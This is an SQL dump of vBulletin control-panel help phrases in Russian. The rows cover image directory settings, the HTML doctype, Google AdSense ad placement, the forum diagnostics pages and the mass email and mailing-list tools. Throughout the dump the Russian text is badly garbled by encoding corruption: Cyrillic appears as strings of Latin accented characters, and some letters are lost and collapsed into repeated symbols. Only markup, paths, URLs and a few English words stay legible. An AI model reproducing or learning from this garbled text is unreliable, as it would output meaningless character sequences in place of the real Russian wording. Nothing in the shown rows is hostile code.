(22175, -1, 'css_doedit_imgdir_statusicon_title', 'cphelptext', 'Ãà ïêà èêîÃîê ñòà òóñà ', 'vbulletin', '', 0, ''),
(22176, -1, 'css_doedit_imgdir_attach_text', 'cphelptext', 'ÈêîÃêè âëîæåÃèé èñïîëüçóþòñÿ äëÿ èäåÃòèôèêà öèè ðà çëè÷Ãûõ òèïîâ âëîæåÃÃûõ ôà éëîâ.  èìåÃà õ ýòèõ èçîáðà æåÃèé èñïîëüçîâà à òèï ôà éëà , êîòîðûé îÃè ïðåäñòà âëÿþò. Ãà ïðèìåð, èçîáðà æåÃèå äëÿ zip-ôà éëîâ Ãà çûâà åòñÿ zip.gif è çà ãðóæåÃî â äèðåêòîðèþ èêîÃîê âëîæåÃèé. \r\n Ââåäèòå ïóòü ê äèðåêòîðèè îòÃîñèòåëüÃî âà øåé äèðåêòîðèè ôîðóìà (Ãà ïðèìåð, images/attach ).', 'vbulletin', '', 0, ''),
(22177, -1, 'css_doedit_imgdir_attach_title', 'cphelptext', 'Äèðåêòîðèÿ èêîÃîê âëîæåÃèé', 'vbulletin', '', 0, ''),
(22178, -1, 'css_doedit_imgdir_misc_text', 'cphelptext', 'Äèðåêòîðèÿ äðóãèõ èçîáðà æåÃèé ñîäåðæèò äðóãèå èçîáðà æåÃèÿ. Ãà ïðèìåð, îÃà âêëþ÷à åò èêîÃêè ñëóæá ìãÃîâåÃÃûõ ñîîáùåÃèé è èêîÃêó vb_bullet.gif. \r\n\r\nÂâåäèòå ïóòü ê äèðåêòîðèè îòÃîñèòåëüÃî âà øåé äèðåêòîðèè ôîðóìà (Ãà ïðèìåð, images/misc ).', 'vbulletin', 'zCarot', 1148680118, '3.6.0 Beta 1'),
(22179, -1, 'css_doedit_imgdir_misc_title', 'cphelptext', 'Äèðåêòîðèÿ äðóãèõ èçîáðà æåÃèé', 'vbulletin', '', 0, ''),
(22180, -1, 'css_doedit_imgdir_editor_text', 'cphelptext', 'Äèðåêòîðèÿ ýëåìåÃòîâ óïðà âëåÃèÿ òåêñòîâîãî ðåäà êòîðà ñîäåðæèò ìà ëåÃüêèå ñîêðà ùåÃÃûå èçîáðà æåÃèÿ, êîòîðûå èñïîëüçóþòñÿ â òåêñòîâûõ ðåäà êòîðà õ ôîðóìà (òà êèõ êà ê âèçóà ëüÃûé ðåäà êòîð). \r\n Ââåäèòå ïóòü ê äèðåêòîðèè îòÃîñèòåëüÃî âà øåé äèðåêòîðèè ôîðóìà (Ãà ïðèìåð, images/editor ).', 'vbulletin', '', 0, ''),
(22181, -1, 'css_doedit_imgdir_editor_title', 'cphelptext', 'Äèðåêòîðèÿ ýëåìåÃòîâ óïðà âëåÃèÿ òåêñòîâîãî ðåäà êòîðà ', 'vbulletin', '', 0, ''),
(22182, -1, 'css_doedit_imgdir_poll_text', 'cphelptext', 'Äèðåêòîðèÿ èçîáðà æåÃèé äëÿ îïðîñîâ ñîäåðæèò èçîáðà æåÃèÿ, êîòîðûå èñïîëüçóþòñÿ äëÿ ñîçäà Ãèÿ öâåòÃûõ ïîëîñ â ðåçóëüòà òà õ îïðîñà . \r\n Ââåäèòå ïóòü ê äèðåêòîðèè îòÃîñèòåëüÃî âà øåé äèðåêòîðèè ôîðóìà (Ãà ïðèìåð, images/polls ).', 'vbulletin', '', 0, ''),
(22183, -1, 'css_doedit_imgdir_poll_title', 'cphelptext', 'Äèðåêòîðèÿ èçîáðà æåÃèé äëÿ îïðîñîâ', 'vbulletin', '', 0, ''),
(22184, -1, 'css_doedit_imgdir_rating_text', 'cphelptext', 'Ãà ïêà èçîáðà æåÃèé ðåéòèÃãà ñîäåðæèò èçîáðà æåÃèÿ çâåçäî÷åê, èñïîëüçóåìûõ äëÿ ðåéòèÃãîâ òåì. \r\n Ââåäèòå ïóòü ê äèðåêòîðèè îòÃîñèòåëüÃî âà øåé äèðåêòîðèè ôîðóìà (Ãà ïðèìåð, images/rating ).', 'vbulletin', '', 0, ''),
(22185, -1, 'css_doedit_imgdir_rating_title', 'cphelptext', 'Ãà ïêà èçîáðà æåÃèé ðåéòèÃãà ', 'vbulletin', '', 0, ''),
(22186, -1, 'css_doedit_htmldoctype_text', 'cphelptext', 'ÎáúÿâëåÃèå <!DOCTYPE> - ñà ìà ÿ ïåðâà ÿ âåùü â âà øåì äîêóìåÃòå, äà æå äî òåãà <html>. Ãòîò òåã ñîîáùà åò êà êóþ ñïåöèôèêà öèþ HTML èëè XHTML èñïîëüçóåò äîêóìåÃò. Ôîðóì ïî óìîë÷à Ãèþ èñïîëüçóåò XHTML Transitional DTD òî åñòü: <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">', 'vbulletin', '', 0, ''),
(22187, -1, 'css_doedit_htmldoctype_title', 'cphelptext', 'Òèï äîêóìåÃòà HTML', 'vbulletin', '', 0, ''),
(22188, -1, 'css_doedit_imgdir_reputation_text', 'cphelptext', 'Ãà ïêà èçîáðà æåÃèé ðåïóòà öèè ñîäåðæèò ìà ëåÃüêèå öâåòÃûå òî÷å÷Ãûå èçîáðà æåÃèÿ, êîòîðûå èñïîëüçóþòñÿ äëÿ îòîáðà æåÃèÿ óðîâÃÿ ðåïóòà öèè ïîëüçîâà òåëÿ. \r\n Ââåäèòå ïóòü ê äèðåêòîðèè îòÃîñèòåëüÃî âà øåé äèðåêòîðèè ôîðóìà (Ãà ïðèìåð, images/reputation ).', 'vbulletin', '', 0, ''),
(22189, -1, 'css_doedit_imgdir_reputation_title', 'cphelptext', 'Ãà ïêà èçîáðà æåÃèé ðåïóòà öèè', 'vbulletin', '', 0, ''),
(22190, -1, 'deployads_intro_text', 'cphelptext', 'vBulletin ïðåäîñòà âëÿåò äâà âà ðèà Ãòà èñïîëüçîâà Ãèÿ Google AdSense. ÃŽÃè ðà çëè÷à þòñÿ Ãà áîðîì è ìåñòîïîëîæåÃèåì ðåêëà ìû â øà áëîÃà õ ôîðóìà . Âû ìîæåòå óêà çà òü òèï ðåêëà ìû, êîòîðà ÿ áóäåò ðà çìåùà òüñÿ Ãà âà øåì ôîðóìå.
\r\n\r\nÒèï ðåêëà ìÃûõ îáúÿâëåÃèé
\r\n\r\nÑ ïîìîùüþ ýòîãî ïà ðà ìåòðà âû ìîæåòå óïðà âëÿòü òèïîì ðåêëà ìÃûõ îáúÿâëåÃèé Google AdSense.
\r\n\r\nÒîëüêî òåêñò: AdSense áóäåò îòîáðà æà òü ðåêëà ìÃûå îáúÿâëåÃèÿ, ñîäåðæà ùèå òîëüêî òåêñò è ññûëêè. \r\n\r\nÒåêñò è èçîáðà æåÃèÿ: AdSense áóäåò ñòà ðà òüñÿ îòîáðà æà òü ãðà ôè÷åñêèå ðåêëà ìÃûå îáúÿâëåÃèÿ, Ãî åñëè èõ ÃÃ¥ áóäåò, òî áóäóò îòîáðà æà òüñÿ òåêñòîâûå. Ãòî ïðåäïî÷òèòåëüÃûé âà ðèà Ãò. \r\n\r\nÃåç ðåêëà ìû Google AdSense
\r\n\r\nÃòà îïöèÿ óáåð¸ò âñå ñêðèïòû Google AdSense èç âà øèõ ðåêëà ìÃûõ øà áëîÃîâ ôîðóìà .
\r\n\r\nÌà ëî ðåêëà ìÃûõ îáúÿâëåÃèé
\r\n\r\nÄà ÃÃûé âà ðèà Ãò äîáà âèò äâà Ãåáîëüøèõ ðåêëà ìÃûõ áëîêà Ãà îñÃîâÃûå ñòðà Ãèöû ôîðóìà :
\r\n\r\nÃèæå Ãà âèãà öèîÃÃîé ïà Ãåëè: ÃîðèçîÃòà ëüÃûé áëîê ñ 5 êîÃòåêñòÃûìè ññûëêà ìè. Ãòîò áëîê âñåãäà áóäåò òîëüêî òåêñòîâûì. Öâåò áëîêà ñîîòâåòñòâóåò öâåòó ôîÃà . \r\n\r\nÃîä ñîäåðæèìûì ñòðà Ãèöû, âûøå øà áëîÃà footer: Ãåáîëüøîé ãîðèçîÃòà ëüÃûé áëîê. Öâåò áëîêà ñîîòâåòñòâóåò öâåòó ôîÃà . \r\n\r\nÃŒÃîãî ðåêëà ìÃûõ îáúÿâëåÃèé
\r\n\r\nÃèæå Ãà âèãà öèîÃÃîé ïà Ãåëè: ÑðåäÃèé ãîðèçîÃòà ëüÃûé áëîê. Öâåò áëîêà ñîîòâåòñòâóåò öâåòó ôîÃà . \r\n\r\nÃîä ñîäåðæèìûì ñòðà Ãèöû, âûøå øà áëîÃà footer: ÑðåäÃèé ãîðèçîÃòà ëüÃûé òåêñòîâûé áëîê. Öâåò áëîêà ñîîòâåòñòâóåò öâåòó ôîÃà . \r\n\r\nÑïðà âà îò òåêñòà ïåðâîãî ñîîáùåÃèÿ: Âèäèì òîëüêî ãîñòÿì ôîðóìà (ëèáî òåì, êòî ÃÃ¥ âîø¸ë Ãà ôîðóì ïîä ñâîèì èìåÃåì ïîëüçîâà òåëÿ). Ãðà êòè÷åñêè êâà äðà òÃûé ðåêëà ìÃûé áëîê. \r\n\r\nÄîïîëÃèòåëüÃà ÿ èÃôîðìà öèÿ îò Google
\r\n\r\n×òîáû óçÃà òü áîëüøå î ðåêëà ìÃûõ áëîêà õ è âîîáùå îá Google AdSense, ïîæà ëóéñòà , ïðîéäèòå ïî ýòîé ññûëêå: \r\nhttps://www.google.com/adsense/support/
\r\n\r\nJelsoft Enterprises Limited ÃÃ¥ Ãåñ¸ò îòâåòñòâåÃÃîñòè çà ñîäåðæèìîå âÃåøÃèõ ñà éòîâ.
', 'vbulletin', 'zCarot', 1231504906, '3.8.1'),
(22191, -1, 'deployads_intro_title', 'cphelptext', 'Google AdSense', 'vbulletin', 'Jelsoft', 1228486407, '3.8.0 Beta 4'),
(22192, -1, 'diagnostic_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃåçåðâÃîå êîïèðîâà Ãèå áà çû äà ÃÃûõ \r\nÂîññòà ÃîâëåÃèå/îïòèìèçà öèÿ \r\nÎáÃîâëåÃèå ñ÷¸ò÷èêîâ \r\nÄèà ãÃîñòèêà \r\nÂûïîëÃÃ¥Ãèå SQL çà ïðîñà \r\n\r\nÄèà ãÃîñòèêà : \r\n Ñòðà Ãèöà äèà ãÃîñòèêè ñîäåðæèò Ãåñêîëüêî äèà ãÃîñòè÷åñêèõ òåñòîâ, ïîëåçÃûõ äëÿ ïîèñêà Ãåèñïðà âÃîñòåé è îøèáîê Ãà âà øåì ôîðóìå è â åãî Ãà ñòðîéêà õ. \r\n Äèà ãÃîñòèêà çà êà ÷êè ïðîâåðÿåò ôóÃêöèîÃà ëüÃîñòü çà êà ÷êè ôà éëîâ Ãà âà ø ñåðâåð. Åñëè âà ø ñåðâåð ñêîÃôèãóðèðîâà à ÃÃ¥ ïðà âèëüÃî, òî Ãåêîòîðûå âîçìîæÃîñòè ôîðóìà ÃÃ¥ áóäóò ðà áîòà òü (ê ýòèì âîçìîæÃîñòÿì îòÃîñÿòñÿ çà êà ÷êà à âà òà ðîâ è âëîæåÃèå ôà éëîâ â ñîîáùåÃèÿ). \r\n Äèà ãÃîñòèêà ýëåêòðîÃÃîé ïî÷òû îòïðà âèò òåñòîâîå ïèñüìî ïî óêà çà ÃÃîìó âà ìè à äðåñó. Åñëè âû ïîëó÷èòå òåñòîâîå ïèñüìî, çÃà ÷èò PHP è âà ø ïî÷òîâûé ñåðâåð ñêîÃôèãóðèðîâà Ãû ïðà âèëüÃî. Ãåç ôóÃêöèîÃèðîâà Ãèÿ ôóÃêöèè îòïðà âêè ýëåêòðîÃÃîé ïî÷òû âû ÃÃ¥ ñìîæåòå èñïîëüçîâà òü ïî÷òîâûå âîçìîæÃîñòè âà øåãî ôîðóìà , âêëþ÷à ÿ ïî÷òîâîå ïîäòâåðæäåÃèå î ðåãèñòðà öèè è ôóÃêöèþ \"Ãà ïèñà òü äðóãó.\" \r\n Ãîèñê óñòà ðåâøèõ âåðñèé ôà éëîâ ïðîâåðÿåò âåðñèþ êà æäîãî PHP-ôà éëà â äèðåêòîðèè âà øåãî ôîðóìà è ñîîáùà åò âà ì, êà êèå èç Ãèõ ïðåäÃà çÃà ÷åÃû äëÿ äðóãîé âåðñèè äâèæêà ôîðóìà , îòëè÷Ãîé îò òîé, êîòîðóþ âû èñïîëüçóåòå. Çà ïóñê ôà éëîâ, ÃÃ¥ ïðåäÃà çÃà ÷åÃÃûõ äëÿ âà øåé âåðñèè ôîðóìà , ìîæåò ñòà òü ïðè÷èÃîé Ãåêîòîðûõ ïðîáëåì. Åñëè êà êèå-òî ôà éëû îòÃîñÿòñÿ ê äðóãèì âåðñèÿì, âà ì ñëåäóåò çà ãðóçèòü èñõîäÃûå ôà éëû èç zip-ôà éëà âà øåé âåðñèè. \r\n ÑèñòåìÃà ÿ èÃôîðìà öèÿ äà åò îò÷åò ïî êîÃôèãóðà öèè âà øåãî MySQL-ñåðâåðà è ñîñòîÿÃèè âà øåé áà çû äà ÃÃûõ. ÀäìèÃèñòðà òîðà ì ôîðóìà ìîãóò ïîòðåáîâà òüñÿ ðåçóëüòà òû ýòèõ îò÷åòîâ, îÃè ìîãóò ïîìî÷ü Ãà éòè Ãåèñïðà âÃîñòè è îøèáêè Ãà âà øåì ñåðâåðå è ôîðóìå.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22193, -1, 'diagnostic_title', 'cphelptext', 'ÃŽ äèà ãÃîñòèêå', 'vbulletin', '', 0, ''),
(22194, -1, 'diagnostic_domail_text', 'cphelptext', 'Ãòî ðåçóëüòà òû òåñòà âà øèõ Ãà ñòðîåê ýëåêòðîÃÃîé ïî÷òû. Åñëè â ïðîöåññå òåñòà âîçÃèêëè êà êèå-òî îøèáêè, îÃè áóäóò îòîáðà æåÃû âìåñòå ñî çÃà ÷åÃèÿìè Ãåñêîëüêèõ îòÃîñÿùèõñÿ ê ýòîìó Ãà ñòðîåê.', 'vbulletin', '', 0, ''),
(22195, -1, 'diagnostic_domail_title', 'cphelptext', 'Òåñò Ãà ñòðîåê ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(22196, -1, 'diagnostic_dosysinfo_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå ïîêà çà Ãà Ãåêîòîðà ÿ èÃôîðìà öèÿ î âà øåé ñèñòåìå. \r\n Ãèæå ïåðå÷èñëåÃû ðà çëè÷Ãûå ðà çäåëû èÃôîðìà öèè î ñèñòåìå, êîòîðà ÿ ìîæåò áûòü ïîêà çà Ãà : \r\nÃåðåìåÃÃûå MySQL - ñïèñîê îïðåäåëåÃÃûõ â MySQL ïåðåìåÃÃûõ. Ãîæà ëóéñòà , ïîñåòèòå ñëåäóþùèå ñòðà Ãèöû äëÿ ïîëó÷åÃèÿ áîëüøåé èÃôîðìà öèè ïî ïåðåìåÃÃûì MySQL è èõ çÃà ÷åÃèÿì: ÃåðåìåÃÃûå MySQL , Ãà ðà ìåòðû Ãà ñòðîéêè ñåðâåðà . \r\nÑòà òóñ MySQL - ïîêà çûâà åò ñîñòîÿÃèå ìÃîãèõ âåùåé, îòÃîñÿùèõñÿ ê MySQL-ñåðâåðó. Äëÿ ïîëó÷åÃèÿ áîëüøåé èÃôîðìà öèè îá ýëåìåÃòà õ ñïèñêà Ãà ýòîé ñòðà Ãèöå, ïîñåòèòå Ñòà òóñ MySQL . \r\nÑòà òóñ òà áëèö - Åñëè âû èñïîëüçóåòå MySQL 3.23 èëè âûøå, âû ìîæåòå òà êæå âèäåòü è òà êóþ èÃôîðìà öèîÃÃóþ ñòðà Ãèöó. Ñëåäóþùà ÿ ññûëêà äà åò áîëüøå èÃôîðìà öèè îá îòîáðà æåÃÃîì Ãà ýòîé ñòðà Ãèöå: Ñòà òóñ MySQL-òà áëèöû .', 'vbulletin', '', 0, ''),
(22197, -1, 'diagnostic_dosysinfo_title', 'cphelptext', 'ÑèñòåìÃà ÿ èÃôîðìà öèÿ', 'vbulletin', '', 0, ''),
(22198, -1, 'diagnostic_doupload_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âà ì ïîêà çà Ãû ðåçóëüòà òû òåñòà çà êà ÷êè. Ãðåäñòà âëåà ñïèñîê îòÃîñÿùèõñÿ ê Ãåé PHP-Ãà ñòðîåê è îøèáîê, åñëè îÃè èìåëè ìåñòî. \r\n Äëÿ ïîëó÷åÃèÿ äîïîëÃèòåëüÃîé èÃôîðìà öèè ïî ðà çëè÷Ãûì PHP-Ãà ñòðîéêà ì, ïîñåòèòå ïîæà ëóéñòà , ñëåäóþùèå ññûëêè: \r\nfile_uploads \r\nopen_basedir \r\nsafe_mode \r\nupload_tmp_dir \r\nupload_max_filesize ', 'vbulletin', '', 0, ''),
(22199, -1, 'diagnostic_doupload_title', 'cphelptext', 'Ãåçóëüòà òû òåñòà çà êà ÷êè', 'vbulletin', '', 0, ''),
(22200, -1, 'diagnostic_doversion_text', 'cphelptext', 'Âñå ôà éëû, ïðèâåäåÃÃûå Ãèæå, âîçìîæÃî îòÃîñÿòñÿ ê ïðåäûäóùåé âåðñèè ôîðóìà . Âà ì ñëåäóåò çà ìåÃèòü ôà éëû, ïðèâåäåÃÃûå Ãèæå, Ãà èñõîäÃûå ôà éëû èç zip-à ðõèâà âà øåé âåðñèè ôîðóìà .', 'vbulletin', '', 0, ''),
(22201, -1, 'diagnostic_doversion_title', 'cphelptext', 'Âåðñèè óñòà ðåâøèõ ôà éëîâ', 'vbulletin', '', 0, ''),
(22202, -1, 'diagnostic_list_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå çà ïóñòèòü Ãåñêîëüêî äèà ãÃîñòè÷åñêèõ òåñòîâ äëÿ ïðîâåðêè Ãà ñòðîåê è ïîèñêà Ãåèñïðà âÃîñòåé â õîäå çà êà ÷êè ôà éëîâ èëè ðà ññûëêè ïèñåì. ÄîïîëÃèòåëüÃî âû ìîæåòå óâèäåòü òðè ðà çëè÷Ãûõ âèäà ñèñòåìÃîé èÃôîðìà öèè. Ãèæå äîñòóïÃà äîïîëÃèòåëüÃà ÿ èÃôîðìà öèÿ.', 'vbulletin', '', 0, ''),
(22203, -1, 'diagnostic_list_title', 'cphelptext', 'Çà ïóñê äèà ãÃîñòè÷åñêèõ òåñòîâ', 'vbulletin', '', 0, ''),
(22204, -1, 'diagnostic_list_attachfile_text', 'cphelptext', 'Äëÿ ýòîãî òåñòà âà ì ÃóæÃî âûáðà òü ôà éë äëÿ çà êà ÷êè Ãà ñåðâåð. Ãòîò ôà éë áóäåò óäà ëåà ÃåìåäëåÃÃî ïîñëå çà âåðøåÃèÿ òåñòà è ÃÃ¥ áóäåò ñîõðà Ãåà Ãà ñåðâåðå áîëåå ÷åì Ãà 1/2 ñåêóÃäû. Ãîñëå âûáîðà ôà éëà , Ãà æìèòå êÃîïêó \"Çà ãðóçèòü\".', 'vbulletin', '', 0, ''),
(22205, -1, 'diagnostic_list_attachfile_title', 'cphelptext', 'Èìÿ ôà éëà ', 'vbulletin', '', 0, ''),
(22206, -1, 'diagnostic_list_emailaddress_text', 'cphelptext', ' ýòîì òåñòå âû äîëæÃû ââåñòè ñóùåñòâóþùèé à äðåñ ýëåêòðîÃÃîé ïî÷òû äëÿ îòïðà âêè Ãà Ãåãî òåñòîâîãî ïèñüìà . Ãîñëå òîãî, êà ê âû ýòî ñäåëà åòå, Ãà æìèòå \"Îòïðà âèòü\", è äâèæîê ôîðóìà ïîïûòà åòñÿ ïîñëà òü ïèñüìî ïî óêà çà ÃÃîìó à äðåñó è ïîêà æåò ðåçóëüòà ò - îòñóòñòâèå îøèáîê, åñëè èõ ÃÃ¥ âîçÃèêëî.', 'vbulletin', '', 0, ''),
(22207, -1, 'diagnostic_list_emailaddress_title', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(22208, -1, 'diagnostic_list_type_text', 'cphelptext', ' ýòîé ñåêöèè âûáåðèòå äëÿ ïðîñìîòðà îäèà èç òðåõ âèäîâ èÃôîðìà öèè: ñòà òóñ òà áëèöû (åñëè âû èñïîëüçóåòå MySQL 3.23 èëè âûøå), ñòà òóñ MySQL è ïåðåìåÃÃûå MySQL. (Ñì. ÈÃôîðìà öèÿ î ñèñòåìå )', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(22209, -1, 'diagnostic_list_type_title', 'cphelptext', 'Ñìîòðåòü...', 'vbulletin', '', 0, ''),
(22210, -1, 'diagnostic_payments_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïðîâåðèò âà øè à êòèâÃûå ñïîñîáû îïëà òû Ãà ðà áîòîñïîñîáÃîñòü ñ óêà çà ÃÃûìè âà ìè ïà ðà ìåòðà ìè â Óïðà âëåÃèè ñïîñîáà ìè îïëà òû . Åñëè êà êîå-ëèáî ñîåäèÃÃ¥Ãèå áóäåò Ãåóäà ÷Ãûì, òî ýòî çÃà ÷èò, ÷òî ýòîò ñïîñîá îïëà òû ÃÃ¥ ðà áîòà åò ñ âà øèì ôîðóìîì, òî åñòü âû óñòà Ãîâèëè ÃåâåðÃûå ïà ðà ìåòðû ñà ìîé ñèñòåìû îïëà òû, èëè ââåëè ÃåâåðÃûå çÃà ÷åÃèÿ î ñåáå.', 'vbulletin', '', 0, ''),
(22211, -1, 'diagnostic_payments_title', 'cphelptext', 'Ãðîâåðêà ñâÿçè', 'vbulletin', '', 0, ''),
(22212, -1, 'email_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃîëüçîâà òåëè \r\nÃîëüçîâà òåëüñêèå èÃñòðóìåÃòû \r\nÃëîêèðîâêà ïîëüçîâà òåëåé \r\nÎòïðà âêà ýëåêòðîÃÃûõ ïèñåì ïîëüçîâà òåëÿì \r\nÌà ñêè äîñòóïà \r\nÎòïðà âêà ýëåêòðîÃÃûõ ïèñåì ïîëüçîâà òåëÿì: \r\nÑòðà Ãèöû à äðåñîâ â çà êëà äêå ïîëüçîâà òåëåé Ãà êîÃòðîëüÃîé ïà Ãåëè à äìèÃèñòðà òîðà ïîçâîëÿò âà ì äåëà òü ìà ññîâóþ ðà ññûëêó è ñîçäà âà òü ïî÷òîâûå ñïèñêè, êîòîðûå ñîñòà âëÿþòñÿ ïî îäÃîìó è òîìó æå êðèòåðèþ ñî ñòðà Ãèöû Ãîèñê ïîëüçîâà òåëåé . \r\n Âû ìîæåòå îòïðà âèòü ïîëüçîâà òåëÿì ïèñüìî, èñïîëüçóÿ îïöèþ Îòïðà âêà ýëåêòðîÃÃûõ ïèñåì ïîëüçîâà òåëÿì è ìîæåòå ñîçäà âà òü ïî÷òîâûå ñïèñêè ñ à äðåñà ìè Ãà Ñîçäà Ãèå ïî÷òîâûõ ñïèñêîâ . Îáå ñòðà Ãèöû èñïîëüçóþò îäèà è òîò æå êðèòåðèé äëÿ ïîèñêà .  ñîçäà ÃÃûé ïî÷òîâûé ëèñò âêëþ÷à þòñÿ òîëüêî òå ïîëüçîâà òåëè, ÷üè ïðîôèëè ñîîòâåòñòâóþò êðèòåðèþ ïîèñêà , óêà çà ÃÃîìó âà ìè. ÎäÃî èç âîçìîæÃûõ ïðèìåÃÃ¥Ãèé - ìà ññîâà ÿ ðà ññûëêà äëÿ óâåäîìëåÃèÿ ïîëüçîâà òåëåé îá îáÃîâëåÃèè âà øåãî ôîðóìà . Ê äðóãîìó ïðèìåÃÃ¥Ãèþ îòÃîñèòñÿ îòïðà âêà ïèñåì, ïðåäóïðåæäà þùà ÿ Ãåêîòîðûõ ïîëüçîâà òåëåé îá èõ ÃÃ¥ à êòèâÃîñòè ïðåæäå, ÷åì âû óäà ëèòå èõ à êêà óÃòû èëè äîãîâîðèòåñü ñ Ãèìè.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22213, -1, 'email_title', 'cphelptext', 'Î ìà ññîâîé ðà ññûëêå', 'vbulletin', '', 0, ''),
(22214, -1, 'email_genlist_text', 'cphelptext', 'Çäåñü âû ìîæåòå âûáðà òü êðèòåðèè, ñîãëà ñÃî êîòîðûì áóäåò ñîçäà à ñïèñîê à äðåñîâ ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëåé. Ãòîò ñïèñîê ìîæåò èñïîëüçîâà òüñÿ äðóãîé ïðîãðà ììîé (Ãà ïðèìåð Outlook) äëÿ îòïðà âêè ïèñåì ýòèì ïîëüçîâà òåëÿì. Êðèòåðèè îïèñà Ãû Ãèæå. \r\n Ó÷òèòå, ÷òî âñå êðèòåðèè ñîãëà ñîâà Ãû. Ã’.Ã¥. åñëè âû ââåëè ôðà ãìåÃò èìåÃè ïîëüçîâà òåëÿ è âûáðà ëè ãðóïïó ïîëüçîâà òåëåé, òî áóäóò Ãà éäåÃû ïîëüçîâà òåëè âûáðà ÃÃîé ãðóïïû ñ ñîâïà äåÃèåì â èìåÃè, Ãî ÃÃ¥ òå, ó êîãî ñîâïà ë òîëüêî îäèà êðèòåðèé.', 'vbulletin', '', 0, ''),
(22215, -1, 'email_genlist_title', 'cphelptext', 'Ñîçäà Ãèå ñïèñêà à äðåñîâ ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22216, -1, 'email_genlist_septext_text', 'cphelptext', 'Ââåäèòå ñèìâîë èëè òåêñò, êîòîðûì äîëæÃû áóäóò ðà çäåëÿòüñÿ à äðåñà . ×òî ýòî áóäåò çà ñèìâîë, çà âèñèò îò òîãî, ñ ïîìîùüþ êà êîé ïðîãðà ììû âû áóäåòå çà äà âà òü ýòè à äðåñà . Ãî óìîë÷à Ãèþ ýòî ïðîáåë, Ãî âîçìîæÃî âà ì ïîòðåáóåòñÿ ðà çäåëÿòü çÃà ÷åÃèÿ çà ïÿòûìè (â ýòîì ñëó÷à å èñïîëüçóéòå çà ïÿòóþ) èëè Ãà õîäèëèñü â êà âû÷êà õ è ðà çäåëÿëèñü çà ïÿòûìè (â ýòîì ñëó÷à å èñïîëüçóéòå \",\" - âêëþ÷à ÿ êà âû÷êè).  áîëüøèÃñòâå ïî÷òîâûõ ïðîãðà ìì ïîñëå çà ïÿòîé èëè òî÷êè ñ çà ïÿòîé òðåáóåòñÿ ïðîáåë. ÎäÃà êî âà øè çà ïðîñû ìîãóò îòëè÷à òüñÿ îò ýòîãî òðåáîâà Ãèÿ. Äëÿ òîãî, ÷òîáû êà æäûé à äðåñ áûë Ãà Ãîâîé ñòðî÷êå, Ãà æìèòå â òåêñòîâîì ïîëå Enter.', 'vbulletin', '', 0, ''),
(22217, -1, 'email_genlist_septext_title', 'cphelptext', 'Òåêñò, ðà çäåëÿþùèé à äðåñà ', 'vbulletin', '', 0, ''),
(22218, -1, 'email_genlist_start_username_text', 'cphelptext', 'ÈìåÃà ïîëüçîâà òåëåé, êîòîðûì áóäåò îòïðà âëåÃî ïèñüìî, ñîäåðæà ò ñòðîêó, ââåäåÃÃóþ â ýòîì ïîëå. Ñèìâîëû ýòîé ñòðîêè ÃÃ¥ îáÿçà òåëüÃî äîëæÃû ñîñòà âëÿòü ñëîâî, Ãî îÃè äîëæÃû áûòü â òî÷Ãîñòè òà êèìè, êà ê îÃè åñòü â èìåÃè ïîëüçîâà òåëåé. \r\n Ãà ïðèìåð, ñòðîêå ñòðà à áóäóò ñîîòâåòñòâîâà òü ñòðà à èöà , ñòðà à à è ïðîñòðà à ñòâî, Ãî ÃÃ¥ ðåñòîðà à .', 'vbulletin', '', 0, ''),
(22219, -1, 'email_genlist_start_username_title', 'cphelptext', 'Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(22220, -1, 'email_genlist_start_usergroupid_text', 'cphelptext', 'Ãîëüçîâà òåëè, êîòîðûì áóäóò îòïðà âëåÃî ïèñüìî, äîëæÃû áóäóò ñîñòîÿòü â óêà çà ÃÃîé ãðóïïå, åñëè âû óêà æåòå åå çäåñü.', 'vbulletin', '', 0, ''),
(22221, -1, 'email_genlist_start_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22222, -1, 'email_genlist_start_membergroup_text', 'cphelptext', '\r\nÊà æäûé ïîëüçîâà òåëü äîëæåà ïðèÃà äëåæà òü âñåì âûáðà ÃÃûì ãðóïïà ì!', 'vbulletin', 'zCarot', 1158055699, '3.6.1'),
(22223, -1, 'email_genlist_start_membergroup_title', 'cphelptext', 'Òà êæå ïðèÃà äëåæèò ãðóïïà ì', 'vbulletin', '', 0, ''),
(22224, -1, 'email_genlist_start_adminemail_text', 'cphelptext', 'Âêëþ÷åÃèå ýòîé îïöèè ïðèâåä¸ò ê îòïðà âêå ýëåêòðîÃÃûõ ïèñåì äà æå òåì ïîëüçîâà òåëÿì, êîòîðûå îòêëþ÷èëè ïîëó÷åÃèå ýëåêòðîÃÃîé ïî÷òû îò à äìèÃèñòðà öèè.', 'vbulletin', '', 0, ''),
(22225, -1, 'email_genlist_start_adminemail_title', 'cphelptext', 'Âêëþ÷à ÿ ïîëüçîâà òåëåé, êîòîðûå îòêëþ÷èëè ïîëó÷åÃèå ýëåêòðîÃÃûõ ïèñåì îò à äìèÃèñòðà öèè?', 'vbulletin', '', 0, ''),
